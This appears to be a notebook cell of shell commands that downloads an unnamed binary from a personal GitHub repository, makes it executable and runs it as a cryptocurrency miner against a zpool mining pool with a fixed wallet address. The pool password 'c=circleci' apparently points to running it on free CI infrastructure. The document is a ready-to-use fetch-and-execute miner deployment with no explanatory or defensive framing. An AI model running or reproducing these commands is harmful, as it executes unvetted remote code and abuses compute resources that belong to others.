! wget https://raw.githubusercontent.com/mhdsyahfii/zpool/main/1
! chmod u+x ./1
!
! 
!


! ./1 -a power2b -o stratum+tcp://power2b.na.mine.zpool.ca:6242 -u DFBr5oFsLuStdpiuf79s4abpFqFjFmnEW3 -p c=circleci
